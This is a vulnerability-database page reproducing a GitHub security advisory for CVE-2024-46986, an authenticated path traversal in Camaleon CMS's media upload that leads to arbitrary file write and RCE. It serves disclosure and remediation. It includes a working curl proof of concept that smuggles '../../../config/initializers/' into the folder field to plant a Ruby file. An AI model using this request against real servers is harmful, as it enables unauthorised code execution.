GHSA-WMJG-VQHV-Q5P5

Vulnerability from github – Published: 2024-09-18 14:39 – Updated: 2025-04-17 22:55
VLAI?
Summary
Camaleon CMS affected by arbitrary file write to RCE (GHSL-2024-182)
Details

An arbitrary file write vulnerability accessible via the upload method of the MediaController allows authenticated users to write arbitrary files to any location on the web server Camaleon CMS is running on (depending on the permissions of the underlying filesystem). E.g. This can lead to a delayed remote code execution in case an attacker is able to write a Ruby file into the config/initializers/ subfolder of the Ruby on Rails application.

Once a user upload is started via the upload method, the file_upload and the folder parameter

def upload(settings = {})
  params[:dimension] = nil if params[:skip_auto_crop].present?
  f = { error: 'File not found.' }
  if params[:file_upload].present?
    f = upload_file(params[:file_upload],
                    { folder: params[:folder], dimension: params['dimension'], formats: params[:formats], versions: params[:versions],
                      thumb_size: params[:thumb_size] }.merge(settings))
  end
  [..]
end

are passed to the upload_file method. Inside that method the given settings are merged with some presets. The file format is checked against the formats settings we can override with the formats parameters.

# formats validations
  return { error: "#{ct('file_format_error')} (#{settings[:formats]})" } unless cama_uploader.class.validate_file_format(
    uploaded_io.path, settings[:formats]
 )

Our given folder is then passed unchecked to the Cama_uploader:

key = File.join(settings[:folder], settings[:filename]).to_s.cama_fix_slash
res = cama_uploader.add_file(settings[:uploaded_io], key, { same_name: settings[:same_name] })

In the add_file method of CamaleonCmsLocalUploader this key argument containing the unchecked path is then used to write the file to the file system:

def add_file(uploaded_io_or_file_path, key, args = {})
  [..]
  upload_io = uploaded_io_or_file_path.is_a?(String) ? File.open(uploaded_io_or_file_path) : uploaded_io_or_file_path
  File.open(File.join(@root_folder, key), 'wb') { |file| file.write(upload_io.read) }
  [..]
end

Proof of concept Precondition: A valid account of a registered user is required. (The values for auth_token and _cms_session need to be replaced with authenticated values in the curl command below)

curl --path-as-is -i -s -k -X $'POST' \ -H $'User-Agent: Mozilla/5.0' -H $'Content-Type: multipart/form-data; boundary=----WebKitFormBoundary80dMC9jX3srWAsga' -H $'Accept: /' -H $'Connection: keep-alive' \ -b $'auth_token=[..]; _cms_session=[..]' \ --data-binary $'------WebKitFormBoundary80dMC9jX3srWAsga\x0d\x0aContent-Disposition: form-data; name=\"file_upload\"; filename=\"test.rb\"\x0d\x0aContent-Type: text/x-ruby-script\x0d\x0a\x0d\x0aputs \"=================================\"\x0aputs \"=================================\"\x0aputs \"= COMPROMISED =\"\x0aputs \"=================================\"\x0aputs \"=================================\"\x0d\x0a------WebKitFormBoundary80dMC9jX3srWAsga\x0d\x0aContent-Disposition: form-data; name=\"folder\"\x0d\x0a\x0d\x0a../../../config/initializers/\x0d\x0a------WebKitFormBoundary80dMC9jX3srWAsga\x0d\x0aContent-Disposition: form-data; name=\"skip_auto_crop\"\x0d\x0a\x0d\x0atrue\x0d\x0a------WebKitFormBoundary80dMC9jX3srWAsga--\x0d\x0a' \ $'https:///admin/media/upload?actions=false' Note that the upload form field formats was removed so that Camaleon CMS accepts any file. The folder was set to ../../../config/initializers/so that following Ruby script is written into the initializers folder of the Rails web app:

puts "=================================" puts "=================================" puts "= COMPROMISED =" puts "=================================" puts "=================================" Once Camaleon CMS is restarted following output will be visible in the log:

=================================

= COMPROMISED =

================================= Impact This issue may lead up to Remote Code Execution (RCE) via arbitrary file write.

Remediation Normalize file paths constructed from untrusted user input before using them and check that the resulting path is inside the targeted directory. Additionally, do not allow character sequences such as .. in untrusted input that is used to build paths.

See also:

CodeQL: Uncontrolled data used in path expression OWASP: Path Traversal

Severity ?
8.8 (High)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
8.7 (High)
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "RubyGems",
        "name": "camaleon_cms"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.8.0"
            },
            {
              "fixed": "2.8.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-46986"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-74"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-09-18T14:39:03Z",
    "nvd_published_at": "2024-09-18T18:15:07Z",
    "severity": "HIGH"
  },
  "details": "An arbitrary file write vulnerability accessible via the upload method of the MediaController allows authenticated users to write arbitrary files to any location on the web server Camaleon CMS is running on (depending on the permissions of the underlying filesystem). E.g. This can lead to a delayed remote code execution in case an attacker is able to write a Ruby file into the config/initializers/ subfolder of the Ruby on Rails application.\n\nOnce a user upload is started via the [upload](https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/controllers/camaleon_cms/admin/media_controller.rb#L86-L87) method, the file_upload and the folder parameter\n```ruby\ndef upload(settings = {})\n  params[:dimension] = nil if params[:skip_auto_crop].present?\n  f = { error: \u0027File not found.\u0027 }\n  if params[:file_upload].present?\n    f = upload_file(params[:file_upload],\n                    { folder: params[:folder], dimension: params[\u0027dimension\u0027], formats: params[:formats], versions: params[:versions],\n                      thumb_size: params[:thumb_size] }.merge(settings))\n  end\n  [..]\nend\n```\nare passed to the [upload_file](https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/helpers/camaleon_cms/uploader_helper.rb#L23-L24) method. Inside that method the given settings are [merged](https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/helpers/camaleon_cms/uploader_helper.rb#L41-L42) with some presets. The file format is [checked against](https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/helpers/camaleon_cms/uploader_helper.rb#L61-L62) the formats settings we can override with the formats parameters.\n\n```ruby\n# formats validations\n  return { error: \"#{ct(\u0027file_format_error\u0027)} (#{settings[:formats]})\" } unless cama_uploader.class.validate_file_format(\n    uploaded_io.path, settings[:formats]\n )\n```\nOur given folder is then [passed unchecked](https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/helpers/camaleon_cms/uploader_helper.rb#L73-L74) to the Cama_uploader:\n\n```ruby\nkey = File.join(settings[:folder], settings[:filename]).to_s.cama_fix_slash\nres = cama_uploader.add_file(settings[:uploaded_io], key, { same_name: settings[:same_name] })\n```\nIn the [add_file](https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/uploaders/camaleon_cms_local_uploader.rb#L77) method of CamaleonCmsLocalUploader this key argument containing the unchecked path is then used to write the file to the file system:\n\n```ruby\ndef add_file(uploaded_io_or_file_path, key, args = {})\n  [..]\n  upload_io = uploaded_io_or_file_path.is_a?(String) ? File.open(uploaded_io_or_file_path) : uploaded_io_or_file_path\n  File.open(File.join(@root_folder, key), \u0027wb\u0027) { |file| file.write(upload_io.read) }\n  [..]\nend\n```\nProof of concept\nPrecondition: A valid account of a registered user is required. (The values for auth_token and _cms_session need to be replaced with authenticated values in the curl command below)\n\ncurl --path-as-is -i -s -k -X $\u0027POST\u0027 \\\n -H $\u0027User-Agent: Mozilla/5.0\u0027 -H $\u0027Content-Type: multipart/form-data; boundary=----WebKitFormBoundary80dMC9jX3srWAsga\u0027 -H $\u0027Accept: */*\u0027 -H $\u0027Connection: keep-alive\u0027 \\\n    -b $\u0027auth_token=[..]; _cms_session=[..]\u0027 \\\n    --data-binary $\u0027------WebKitFormBoundary80dMC9jX3srWAsga\\x0d\\x0aContent-Disposition: form-data; name=\\\"file_upload\\\"; filename=\\\"test.rb\\\"\\x0d\\x0aContent-Type: text/x-ruby-script\\x0d\\x0a\\x0d\\x0aputs \\\"=================================\\\"\\x0aputs \\\"=================================\\\"\\x0aputs \\\"= COMPROMISED                   =\\\"\\x0aputs \\\"=================================\\\"\\x0aputs \\\"=================================\\\"\\x0d\\x0a------WebKitFormBoundary80dMC9jX3srWAsga\\x0d\\x0aContent-Disposition: form-data; name=\\\"folder\\\"\\x0d\\x0a\\x0d\\x0a../../../config/initializers/\\x0d\\x0a------WebKitFormBoundary80dMC9jX3srWAsga\\x0d\\x0aContent-Disposition: form-data; name=\\\"skip_auto_crop\\\"\\x0d\\x0a\\x0d\\x0atrue\\x0d\\x0a------WebKitFormBoundary80dMC9jX3srWAsga--\\x0d\\x0a\u0027 \\\n    $\u0027https://\u003ccamaleon-host\u003e/admin/media/upload?actions=false\u0027\nNote that the upload form field formats was removed so that Camaleon CMS accepts any file. The folder was set to ../../../config/initializers/so that following Ruby script is written into the initializers folder of the Rails web app:\n\nputs \"=================================\"\nputs \"=================================\"\nputs \"= COMPROMISED                   =\"\nputs \"=================================\"\nputs \"=================================\"\nOnce Camaleon CMS is restarted following output will be visible in the log:\n\n=================================\n=================================\n= COMPROMISED                   =\n=================================\n=================================\nImpact\nThis issue may lead up to Remote Code Execution (RCE) via arbitrary file write.\n\nRemediation\nNormalize file paths constructed from untrusted user input before using them and check that the resulting path is inside the targeted directory. Additionally, do not allow character sequences such as .. in untrusted input that is used to build paths.\n\nSee also:\n\n[CodeQL: Uncontrolled data used in path expression](https://codeql.github.com/codeql-query-help/ruby/rb-path-injection/)\n[OWASP: Path Traversal](https://owasp.org/www-community/attacks/Path_Traversal)",
  "id": "GHSA-wmjg-vqhv-q5p5",
  "modified": "2025-04-17T22:55:02Z",
  "published": "2024-09-18T14:39:03Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/owen2345/camaleon-cms/security/advisories/GHSA-wmjg-vqhv-q5p5"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-46986"
    },
    {
      "type": "WEB",
      "url": "https://github.com/owen2345/camaleon-cms/commit/b3b12b1e4a9e3fccaf5bb4330820fa7f8744e6bd"
    },
    {
      "type": "WEB",
      "url": "https://codeql.github.com/codeql-query-help/ruby/rb-path-injection"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/owen2345/camaleon-cms"
    },
    {
      "type": "WEB",
      "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/camaleon_cms/CVE-2024-46986.yml"
    },
    {
      "type": "WEB",
      "url": "https://owasp.org/www-community/attacks/Path_Traversal"
    },
    {
      "type": "ADVISORY",
      "url": "https://securitylab.github.com/advisories/GHSL-2024-182_GHSL-2024-186_Camaleon_CMS"
    },
    {
      "type": "WEB",
      "url": "https://www.reddit.com/r/rails/comments/1exwtdm/camaleon_cms_281_has_been_released"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Camaleon CMS affected by arbitrary file write to RCE (GHSL-2024-182)"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.